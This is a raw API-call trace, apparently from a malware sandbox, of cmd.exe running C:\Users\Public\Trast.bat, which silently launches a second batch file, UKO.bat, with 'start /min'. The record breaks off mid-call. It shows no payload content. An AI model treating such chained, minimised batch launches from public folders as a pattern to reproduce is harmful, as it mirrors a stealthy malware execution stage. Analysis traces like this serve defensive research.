[0127.819] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0127.819] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0127.819] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0127.819] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0127.819] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0127.819] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0127.819] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0127.820] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0127.820] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0127.820] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0127.820] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0127.820] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0127.820] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0127.820] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0127.820] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0127.820] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0127.820] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0127.820] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0127.820] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0127.820] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0127.820] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0127.820] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0127.820] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0127.820] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0127.820] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0127.820] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0127.820] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0127.820] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0127.820] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0127.820] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0127.820] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0127.820] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0127.820] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0127.820] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0127.820] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0127.820] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0127.821] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0127.821] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0127.821] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0127.821] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0127.821] GetProcessHeap () returned 0x5b0000 [0127.821] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x210) returned 0x5bad58 [0127.821] GetProcessHeap () returned 0x5b0000 [0127.821] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x44) returned 0x5baf70 [0127.821] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0127.822] GetProcessHeap () returned 0x5b0000 [0127.822] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x418) returned 0x5bafc0 [0127.822] SetErrorMode (uMode=0x0) returned 0x0 [0127.822] SetErrorMode (uMode=0x1) returned 0x0 [0127.822] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\.", nBufferLength=0x208, lpBuffer=0x5bafc8, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\Public", lpFilePart=0x19f57c*="Public") returned 0xf [0127.822] SetErrorMode (uMode=0x0) returned 0x1 [0127.822] GetProcessHeap () returned 0x5b0000 [0127.822] RtlReAllocateHeap (Heap=0x5b0000, Flags=0x0, Ptr=0x5bafc0, Size=0x3c) returned 0x5bafc0 [0127.822] GetProcessHeap () returned 0x5b0000 [0127.822] RtlSizeHeap (HeapHandle=0x5b0000, Flags=0x0, MemoryPointer=0x5bafc0) returned 0x3c [0127.822] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\Public\\.") returned 1 [0127.822] GetProcessHeap () returned 0x5b0000 [0127.822] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x2e) returned 0x5bb008 [0127.822] GetProcessHeap () returned 0x5b0000 [0127.823] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x50) returned 0x5bb040 [0127.823] GetProcessHeap () returned 0x5b0000 [0127.823] RtlReAllocateHeap (Heap=0x5b0000, Flags=0x0, Ptr=0x5bb040, Size=0x2e) returned 0x5bb040 [0127.823] GetProcessHeap () returned 0x5b0000 [0127.823] RtlSizeHeap (HeapHandle=0x5b0000, Flags=0x0, MemoryPointer=0x5bb040) returned 0x2e [0127.823] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x107f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0127.823] GetProcessHeap () returned 0x5b0000 [0127.823] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xe0) returned 0x5bb078 [0127.827] GetProcessHeap () returned 0x5b0000 [0127.827] RtlReAllocateHeap (Heap=0x5b0000, Flags=0x0, Ptr=0x5bb078, Size=0x76) returned 0x5bb078 [0127.827] GetProcessHeap () returned 0x5b0000 [0127.827] RtlSizeHeap (HeapHandle=0x5b0000, Flags=0x0, MemoryPointer=0x5bb078) returned 0x76 [0127.827] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0127.828] FindFirstFileExW (in: lpFileName="C:\\Users\\Public\\Trast.bat", fInfoLevelId=0x1, lpFindFileData=0x19f328, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f328) returned 0x5bb0f8 [0127.828] GetProcessHeap () returned 0x5b0000 [0127.828] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x14) returned 0x5b75c0 [0127.828] FindClose (in: hFindFile=0x5bb0f8 | out: hFindFile=0x5bb0f8) returned 1 [0127.828] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0127.828] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0127.828] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0127.835] GetProcessHeap () returned 0x5b0000 [0127.835] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x11c) returned 0x5bb0f8 [0127.835] ApiSetQueryApiSetPresence () returned 0x0 [0127.835] ResolveDelayLoadedAPI () returned 0x6cc314a0 [0127.852] SaferWorker () returned 0x0 [0127.919] SetErrorMode (uMode=0x0) returned 0x0 [0127.919] SetErrorMode (uMode=0x1) returned 0x0 [0127.919] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Trast.bat", nBufferLength=0x104, lpBuffer=0x5bad60, lpFilePart=0x19f6ac | out: lpBuffer="C:\\Users\\Public\\Trast.bat", lpFilePart=0x19f6ac*="Trast.bat") returned 0x19 [0127.919] SetErrorMode (uMode=0x0) returned 0x1 [0127.919] GetProcessHeap () returned 0x5b0000 [0127.919] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x40) returned 0x5b06c8 [0127.919] wcsspn (_String=" ", _Control=" \x09") returned 0x1 [0127.919] GetProcessHeap () returned 0x5b0000 [0127.919] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xa) returned 0x5c8220 [0127.919] GetProcessHeap () returned 0x5b0000 [0127.919] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xc) returned 0x5c81a8 [0127.919] GetProcessHeap () returned 0x5b0000 [0127.919] RtlReAllocateHeap (Heap=0x5b0000, Flags=0x0, Ptr=0x5c81a8, Size=0xc) returned 0x5c8148 [0127.919] GetProcessHeap () returned 0x5b0000 [0127.919] RtlSizeHeap (HeapHandle=0x5b0000, Flags=0x0, MemoryPointer=0x5c8148) returned 0xc [0127.919] CmdBatNotificationStub () returned 0x1 [0127.919] CreateFileW (lpFileName="C:\\Users\\Public\\Trast.bat" (normalized: "c:\\users\\public\\trast.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x19f73c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0127.920] _open_osfhandle (_OSFileHandle=0xb4, _Flags=8) returned 3 [0127.920] _get_osfhandle (_FileHandle=3) returned 0xb4 [0127.920] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.920] _get_osfhandle (_FileHandle=3) returned 0xb4 [0127.920] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0127.920] ReadFile (in: hFile=0xb4, lpBuffer=0x108b960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x19f6c4, lpOverlapped=0x0 | out: lpBuffer=0x108b960*, lpNumberOfBytesRead=0x19f6c4*=0x22, lpOverlapped=0x0) returned 1 [0127.921] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x108b960, cbMultiByte=34, lpWideCharStr=0x10767e0, cchWideChar=8191 | out: lpWideCharStr="start /min C:\\Users\\Public\\UKO.bat") returned 34 [0127.922] GetProcessHeap () returned 0x5b0000 [0127.922] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x400a) returned 0x5bbfd8 [0127.922] GetProcessHeap () returned 0x5b0000 [0127.922] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5bbfd8) returned 1 [0127.923] _wcsicmp (_String1="start", _String2=")") returned 74 [0127.923] _wcsicmp (_String1="FOR", _String2="start") returned -13 [0127.923] _wcsicmp (_String1="FOR/?", _String2="start") returned -13 [0127.923] _wcsicmp (_String1="IF", _String2="start") returned -10 [0127.923] _wcsicmp (_String1="IF/?", _String2="start") returned -10 [0127.923] _wcsicmp (_String1="REM", _String2="start") returned -1 [0127.923] _wcsicmp (_String1="REM/?", _String2="start") returned -1 [0127.923] GetProcessHeap () returned 0x5b0000 [0127.923] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x58) returned 0x5c8418 [0127.923] GetProcessHeap () returned 0x5b0000 [0127.923] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x14) returned 0x5b76c0 [0128.526] _get_osfhandle (_FileHandle=3) returned 0xb4 [0128.526] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x22 [0128.526] ReadFile (in: hFile=0xb4, lpBuffer=0x108b960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x19f5cc, lpOverlapped=0x0 | out: lpBuffer=0x108b960*, lpNumberOfBytesRead=0x19f5cc*=0x0, lpOverlapped=0x0) returned 1 [0128.526] GetLastError () returned 0x0 [0128.526] _get_osfhandle (_FileHandle=3) returned 0xb4 [0128.526] GetFileType (hFile=0xb4) returned 0x1 [0128.526] _get_osfhandle (_FileHandle=3) returned 0xb4 [0128.526] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x22 [0128.527] GetProcessHeap () returned 0x5b0000 [0128.527] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x400a) returned 0x5bbfd8 [0128.527] GetProcessHeap () returned 0x5b0000 [0128.527] RtlFreeHeap (HeapHandle=0x5b0000, Flags=0x0, BaseAddress=0x5bbfd8) returned 1 [0128.527] GetProcessHeap () returned 0x5b0000 [0128.527] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x44) returned 0x5b0710 [0128.527] _tell (_FileHandle=3) returned 34 [0128.527] _close (_FileHandle=3) returned 0 [0128.527] _vsnwprintf (in: _Buffer=0x1087940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x19f4d0 | out: _Buffer="\r\n") returned 2 [0128.527] _get_osfhandle (_FileHandle=1) returned 0x3c [0128.527] GetFileType (hFile=0x3c) returned 0x2 [0128.527] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0128.528] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f4a8 | out: lpMode=0x19f4a8) returned 1 [0129.012] _get_osfhandle (_FileHandle=1) returned 0x3c [0129.012] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1087940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x19f4c0, lpReserved=0x0 | out: lpBuffer=0x1087940*, lpNumberOfCharsWritten=0x19f4c0*=0x2) returned 1 [0129.096] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x107f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x4 [0129.097] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1087720 | out: lpBuffer="C:\\Users\\Public") returned 0xf [0129.097] _vsnwprintf (in: _Buffer=0x107abe0, _BufferCount=0x3fe, _Format="%s", _ArgList=0x19f4cc | out: _Buffer="C:\\Users\\Public") returned 15 [0129.097] _vsnwprintf (in: _Buffer=0x107abfe, _BufferCount=0x3ef, _Format="%c", _ArgList=0x19f4cc | out: _Buffer=">") returned 1 [0129.097] _get_osfhandle (_FileHandle=1) returned 0x3c [0129.097] GetFileType (hFile=0x3c) returned 0x2 [0129.097] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0129.097] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f4ac | out: lpMode=0x19f4ac) returned 1 [0129.142] _get_osfhandle (_FileHandle=1) returned 0x3c [0129.142] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x107abe0*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x19f4c4, lpReserved=0x0 | out: lpBuffer=0x107abe0*, lpNumberOfCharsWritten=0x19f4c4*=0x10) returned 1 [0129.627] _get_osfhandle (_FileHandle=1) returned 0x3c [0129.627] GetFileType (hFile=0x3c) returned 0x2 [0129.627] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0129.627] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f74c | out: lpMode=0x19f74c) returned 1 [0130.290] _get_osfhandle (_FileHandle=1) returned 0x3c [0130.290] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x5b76c8*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x19f764, lpReserved=0x0 | out: lpBuffer=0x5b76c8*, lpNumberOfCharsWritten=0x19f764*=0x5) returned 1 [0130.446] _vsnwprintf (in: _Buffer=0x1087940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x19f76c | out: _Buffer=" /min C:\\Users\\Public\\UKO.bat ") returned 30 [0130.446] _get_osfhandle (_FileHandle=1) returned 0x3c [0130.446] GetFileType (hFile=0x3c) returned 0x2 [0130.446] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0130.446] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f744 | out: lpMode=0x19f744) returned 1 [0130.814] _get_osfhandle (_FileHandle=1) returned 0x3c [0130.814] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1087940*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x19f75c, lpReserved=0x0 | out: lpBuffer=0x1087940*, lpNumberOfCharsWritten=0x19f75c*=0x1e) returned 1 [0130.904] _vsnwprintf (in: _Buffer=0x1087940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x19f780 | out: _Buffer="\r\n") returned 2 [0130.904] _get_osfhandle (_FileHandle=1) returned 0x3c [0130.904] GetFileType (hFile=0x3c) returned 0x2 [0130.904] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0130.904] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x19f758 | out: lpMode=0x19f758) returned 1 [0131.057] _get_osfhandle (_FileHandle=1) returned 0x3c [0131.057] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1087940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x19f770, lpReserved=0x0 | out: lpBuffer=0x1087940*, lpNumberOfCharsWritten=0x19f770*=0x2) returned 1 [0131.109] _wcsicmp (_String1="start", _String2="DIR") returned 15 [0131.109] _wcsicmp (_String1="start", _String2="ERASE") returned 14 [0131.110] _wcsicmp (_String1="start", _String2="DEL") returned 15 [0131.110] _wcsicmp (_String1="start", _String2="TYPE") returned -1 [0131.110] _wcsicmp (_String1="start", _String2="COPY") returned 16 [0131.110] _wcsicmp (_String1="start", _String2="CD") returned 16 [0131.110] _wcsicmp (_String1="start", _String2="CHDIR") returned 16 [0131.110] _wcsicmp (_String1="start", _String2="RENAME") returned 1 [0131.110] _wcsicmp (_String1="start", _String2="REN") returned 1 [0131.110] _wcsicmp (_String1="start", _String2="ECHO") returned 14 [0131.110] _wcsicmp (_String1="start", _String2="SET") returned 15 [0131.110] _wcsicmp (_String1="start", _String2="PAUSE") returned 3 [0131.110] _wcsicmp (_String1="start", _String2="DATE") returned 15 [0131.110] _wcsicmp (_String1="start", _String2="TIME") returned -1 [0131.110] _wcsicmp (_String1="start", _String2="PROMPT") returned 3 [0131.110] _wcsicmp (_String1="start", _String2="MD") returned 6 [0131.111] _wcsicmp (_String1="start", _String2="MKDIR") returned 6 [0131.111] _wcsicmp (_String1="start", _String2="RD") returned 1 [0131.111] _wcsicmp (_String1="start", _String2="RMDIR") returned 1 [0131.111] _wcsicmp (_String1="start", _String2="PATH") returned 3 [0131.111] _wcsicmp (_String1="start", _String2="GOTO") returned 12 [0131.111] _wcsicmp (_String1="start", _String2="SHIFT") returned 12 [0131.111] _wcsicmp (_String1="start", _String2="CLS") returned 16 [0131.111] _wcsicmp (_String1="start", _String2="CALL") returned 16 [0131.111] _wcsicmp (_String1="start", _String2="VERIFY") returned -3 [0131.111] _wcsicmp (_String1="start", _String2="VER") returned -3 [0131.111] _wcsicmp (_String1="start", _String2="VOL") returned -3 [0131.111] _wcsicmp (_String1="start", _String2="EXIT") returned 14 [0131.111] _wcsicmp (_String1="start", _String2="SETLOCAL") returned 15 [0131.111] _wcsicmp (_String1="start", _String2="ENDLOCAL") returned 14 [0131.111] _wcsicmp (_String1="start", _String2="TITLE") returned -1 [0131.111] _wcsicmp (_String1="start", _String2="START") returned 0 [0131.111] GetConsoleTitleW (in: lpConsoleTitle=0x19f2f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0131.222] _wcsicmp (_String1="start", _String2="DIR") returned 15 [0131.222] _wcsicmp (_String1="start", _String2="ERASE") returned 14 [0131.222] _wcsicmp (_String1="start", _String2="DEL") returned 15 [0131.222] _wcsicmp (_String1="start", _String2="TYPE") returned -1 [0131.222] _wcsicmp (_String1="start", _String2="COPY") returned 16 [0131.222] _wcsicmp (_String1="start", _String2="CD") returned 16 [0131.222] _wcsicmp (_String1="start", _String2="CHDIR") returned 16 [0131.222] _wcsicmp (_String1="start", _String2="RENAME") returned 1 [0131.222] _wcsicmp (_String1="start", _String2="REN") returned 1 [0131.222] _wcsicmp (_String1="start", _String2="ECHO") returned 14 [0131.222] _wcsicmp (_String1="start", _String2="SET") returned 15 [0131.222] _wcsicmp (_String1="start", _String2="PAUSE") returned 3 [0131.222] _wcsicmp (_String1="start", _String2="DATE") returned 15 [0131.222] _wcsicmp (_String1="start", _String2="TIME") returned -1 [0131.222] _wcsicmp (_String1="start", _String2="PROMPT") returned 3 [0131.222] _wcsicmp (_String1="start", _String2="MD") returned 6 [0131.222] _wcsicmp (_String1="start", _String2="MKDIR") returned 6 [0131.222] _wcsicmp (_String1="start", _String2="RD") returned 1 [0131.222] _wcsicmp (_String1="start", _String2="RMDIR") returned 1 [0131.222] _wcsicmp (_String1="start", _String2="PATH") returned 3 [0131.222] _wcsicmp (_String1="start", _String2="GOTO") returned 12 [0131.222] _wcsicmp (_String1="start", _String2="SHIFT") returned 12 [0131.222] _wcsicmp (_String1="start", _String2="CLS") returned 16 [0131.223] _wcsicmp (_String1="start", _String2="CALL") returned 16 [0131.223] _wcsicmp (_String1="start", _String2="VERIFY") returned -3 [0131.223] _wcsicmp (_String1="start", _String2="VER") returned -3 [0131.223] _wcsicmp (_String1="start", _String2="VOL") returned -3 [0131.223] _wcsicmp (_String1="start", _String2="EXIT") returned 14 [0131.223] _wcsicmp (_String1="start", _String2="SETLOCAL") returned 15 [0131.223] _wcsicmp (_String1="start", _String2="ENDLOCAL") returned 14 [0131.223] _wcsicmp (_String1="start", _String2="TITLE") returned -1 [0131.223] _wcsicmp (_String1="start", _String2="START") returned 0 [0131.223] GetProcessHeap () returned 0x5b0000 [0131.223] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x80) returned 0x5c8478 [0131.225] GetProcessHeap () returned 0x5b0000 [0131.225] RtlReAllocateHeap (Heap=0x5b0000, Flags=0x0, Ptr=0x5c8478, Size=0x46) returned 0x5c8478 [0131.225] GetProcessHeap () returned 0x5b0000 [0131.225] RtlSizeHeap (HeapHandle=0x5b0000, Flags=0x0, MemoryPointer=0x5c8478) returned 0x46 [0131.225] GetProcessHeap () returned 0x5b0000 [0131.225] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x50) returned 0x5c84c8 [0131.227] GetStdHandle (nStdHandle=0xfffffff6) returned 0x38 [0131.227] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0131.227] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0131.227] _wcsicmp (_String1="min", _String2="AFFINITY") returned 12 [0131.227] _wcsicmp (_String1="min", _String2="ABOVENORMAL") returned 12 [0131.227] _wcsicmp (_String1="min", _String2="BELOWNORMAL") returned 11 [0131.227] _wcsicmp (_String1="min", _String2="B") returned 11 [0131.227] _wcsicmp (_String1="min", _String2="HIGH") returned 5 [0131.227] _wcsicmp (_String1="min", _String2="LOW") returned 1 [0131.227] _wcsicmp (_String1="min", _String2="MIN") returned 0 [0131.228] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="DIR") returned -1 [0131.228] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="ERASE") returned -2 [0131.228] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="DEL") returned -1 [0131.228] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="TYPE") returned -17 [0131.228] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="COPY") returned -53 [0131.228] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="CD") returned -42 [0131.228] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="CHDIR") returned -46 [0131.228] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="RENAME") returned -15 [0131.228] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="REN") returned -15 [0131.228] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="ECHO") returned -2 [0131.228] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="SET") returned -16 [0131.228] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="PAUSE") returned -13 [0131.228] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="DATE") returned -1 [0131.228] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="TIME") returned -17 [0131.228] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="PROMPT") returned -13 [0131.228] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="MD") returned -10 [0131.228] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="MKDIR") returned -10 [0131.228] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="RD") returned -15 [0131.228] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="RMDIR") returned -15 [0131.228] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="PATH") returned -13 [0131.228] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="GOTO") returned -4 [0131.228] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="SHIFT") returned -16 [0131.229] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="CLS") returned -50 [0131.229] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="CALL") returned -39 [0131.229] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="VERIFY") returned -19 [0131.229] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="VER") returned -19 [0131.229] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="VOL") returned -19 [0131.229] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="EXIT") returned -2 [0131.229] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="SETLOCAL") returned -16 [0131.229] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="ENDLOCAL") returned -2 [0131.229] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="TITLE") returned -17 [0131.229] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="START") returned -16 [0131.229] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="DPATH") returned -1 [0131.229] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="KEYS") returned -8 [0131.229] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="MOVE") returned -10 [0131.229] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="PUSHD") returned -13 [0131.229] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="POPD") returned -13 [0131.229] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="ASSOC") returned 2 [0131.229] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="FTYPE") returned -3 [0131.229] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="BREAK") returned 1 [0131.229] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="COLOR") returned -53 [0131.229] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="MKLINK") returned -10 [0131.229] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="FOR") returned -3 [0131.229] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="IF") returned -6 [0131.229] _wcsicmp (_String1="C:\\Users\\Public\\UKO.bat", _String2="REM") returned -15 [0131.229] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0131.230] GetProcessHeap () returned 0x5b0000 [0131.230] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x418) returned 0x5c8520 [0131.230] SetErrorMode (uMode=0x0) returned 0x0 [0131.230] SetErrorMode (uMode=0x1) returned 0x0 [0131.230] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\.", nBufferLength=0x208, lpBuffer=0x5c8528, lpFilePart=0x182b24 | out: lpBuffer="C:\\Users\\Public", lpFilePart=0x182b24*="Public") returned 0xf [0131.230] SetErrorMode (uMode=0x0) returned 0x1 [0131.230] GetProcessHeap () returned 0x5b0000 [0131.230] RtlReAllocateHeap (Heap=0x5b0000, Flags=0x0, Ptr=0x5c8520, Size=0x38) returned 0x5c8520 [0131.230] GetProcessHeap () returned 0x5b0000 [0131.230] RtlSizeHeap (HeapHandle=0x5b0000, Flags=0x0, MemoryPointer=0x5c8520) returned 0x38 [0131.230] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\Public\\.") returned 1 [0131.230] GetProcessHeap () returned 0x5b0000 [0131.230] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x2e) returned 0x5b0b48 [0131.230] GetProcessHeap () returned 0x5b0000 [0131.230] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0x50) returned 0x5c8560 [0131.230] GetProcessHeap () returned 0x5b0000 [0131.230] RtlReAllocateHeap (Heap=0x5b0000, Flags=0x0, Ptr=0x5c8560, Size=0x2e) returned 0x5c8560 [0131.230] GetProcessHeap () returned 0x5b0000 [0131.230] RtlSizeHeap (HeapHandle=0x5b0000, Flags=0x0, MemoryPointer=0x5c8560) returned 0x2e [0131.230] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x107f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0131.230] GetProcessHeap () returned 0x5b0000 [0131.230] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x8, Size=0xe0) returned 0x5c8598 [0131.232] GetProcessHeap () returned 0x5b0000 [0131.232] RtlReAllocateHeap (Heap=0x5b0000, Flags=0x0, Ptr=0x5c8598, Size=0x76) returned 0x5c8598 [0131.232] GetProcessHeap () returned 0x5b0000 [0131.232] RtlSizeHeap (HeapHandle=0x5b0000, Flags=0x0, MemoryPointer=0x5c8598) returned 0x76 [0131.232] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0131.232] FindFirstFileExW (in: 